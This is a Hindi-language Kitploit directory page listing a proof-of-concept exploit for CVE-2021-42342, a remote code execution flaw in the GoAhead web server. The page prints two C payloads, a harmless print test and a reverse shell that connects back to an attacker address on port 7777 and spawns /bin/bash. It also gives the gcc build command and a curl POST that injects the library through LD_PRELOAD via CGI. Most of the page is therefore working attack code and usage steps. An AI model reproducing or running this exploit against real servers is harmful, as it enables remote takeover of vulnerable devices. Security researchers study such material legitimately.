Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-42342 — CVE-2021-42342 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GoAhead वेब सर्वर में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता, जो CGI के माध्यम से LD_PRELOAD इंजेक्शन का प्रदर्शन करके कोड एक्ज़ीक्यूशन और रिवर्स शेल प्राप्त करता है। | Kitploit
उपकरण/GitHubGitHub/mr-xn/cve-2021-42342
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगपेलोड डेवलपमेंट
GitHubmr-xn/cve-2021-42342

CVE-2021-42342

CVE-2021-42342 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GoAhead वेब सर्वर में एक रिमोट कोड एक्ज़ीक्यूशन भेद्यता, जो CGI के माध्यम से LD_PRELOAD इंजेक्शन का प्रदर्शन करके कोड एक्ज़ीक्यूशन और रिवर्स शेल प्राप्त करता है।

रिपॉजिटरी देखें
41624 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-42342

CVE-2021-42342 RCE

POC1: केवल प्रिंट करता है

root@kitploit:~
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
static void before_main(void) __attribute__((constructor));

static void before_main(void)
{
    write(1, "Hello World!\n", 14);
}

POC2: रिवर्स शेल

root@kitploit:~
#include<stdio.h>
#include<stdlib.h>
#include<sys/socket.h>
#include<netinet/in.h>

char *server_ip="***";
uint32_t server_port=7777;

static void reverse_shell(void) __attribute__((constructor));
static void reverse_shell(void) 
{
  int sock = socket(AF_INET, SOCK_STREAM, 0);
  struct sockaddr_in attacker_addr = {0};
  attacker_addr.sin_family = AF_INET;
  attacker_addr.sin_port = htons(server_port);
  attacker_addr.sin_addr.s_addr = inet_addr(server_ip);
  if(connect(sock, (struct sockaddr *)&attacker_addr,sizeof(attacker_addr))!=0)
    exit(0);
  dup2(sock, 0);
  dup2(sock, 1);
  dup2(sock, 2);
  execve("/bin/bash", 0, 0);
}

उपयोग:

चरण 1: gcc hack.c -fPIC -shared -o poc.so

चरण 2: curl -X POST http://[TARGET]/cgi-bin/ -F "LD_PRELOAD=/proc/self/fd/0" -F file='@poc.so;encoder=base64'

स्रोत:

  • https://github.com/kimusan/goahead-webserver-pre-5.1.5-RCE-PoC-CVE-2021-42342-
  • https://mp.weixin.qq.com/s/AS9DHeHtgqrgjTb2gzLJZg
टूल डाउनलोड करें